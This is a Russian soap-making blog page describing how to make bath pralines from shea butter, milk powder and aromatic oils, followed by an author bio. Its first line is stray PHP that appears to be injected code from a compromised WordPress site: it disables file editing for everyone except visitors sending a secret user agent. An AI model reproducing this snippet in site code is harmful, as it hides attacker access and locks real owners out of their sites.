if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Смотрим видео и делаем пралине для ванны | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Смотрим видео и делаем пралине для ванны

Чтобы создать средства по уходу за кожей, следует, прежде всего, выбирать натуральные ингредиенты и избегать излишней химии. Пралине для ванн прекрасно подойдет для любителей молочка и крема для тела, а свойства составляющих элементов приятно удивит и порадует любую женщину

Что­бы создать сред­ства по ухо­ду за кожей, сле­ду­ет, преж­де все­го, выби­рать нату­раль­ные ингре­ди­ен­ты и избе­гать излиш­ней химии. Пра­лине для ванн пре­крас­но подой­дет для люби­те­лей молоч­ка и кре­ма для тела, а свой­ства состав­ля­ю­щих эле­мен­тов при­ят­но уди­вит и пора­ду­ет любую женщину.

В каче­стве кла­де­зя цен­ных пита­тель­ных веществ, кото­рые увлаж­ня­ют и омо­ла­жи­ва­ют кожу, высту­па­ет мас­ло ши. Полез­ны­ми свой­ства­ми изоби­лу­ет и дру­гой ингре­ди­ент — сухое моло­ко, кото­рое еще и помо­га­ет кон­си­стен­ции достичь нуж­но­го объ­е­ма. Дру­гие эфир­ные мас­ла, такие как мас­ло чер­ной смо­ро­ди­ны, какао и коко­са при­да­ют буду­ще­му пра­лине изыс­кан­ный и чув­ствен­ный аромат.

Что­бы кра­си­во офор­мить сред­ство по ухо­ду за кожей, мож­но почи­тать нашу спе­ци­аль­ную ста­тью про пода­роч­ную упа­ков­ку или исполь­зо­вать одно­ра­зо­вые бумаж­ные розет­ки для выпеч­ки. Когда фор­моч­ки будут до кра­ев напол­не­ны при­го­тов­лен­ной сме­сью, поверх­ность пра­лине мож­но укра­сить все­воз­мож­ны­ми сухо­цве­та­ми для созда­ния допол­ни­тель­ной нот­ки аро­ма­та и укра­ше­ния изделия.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!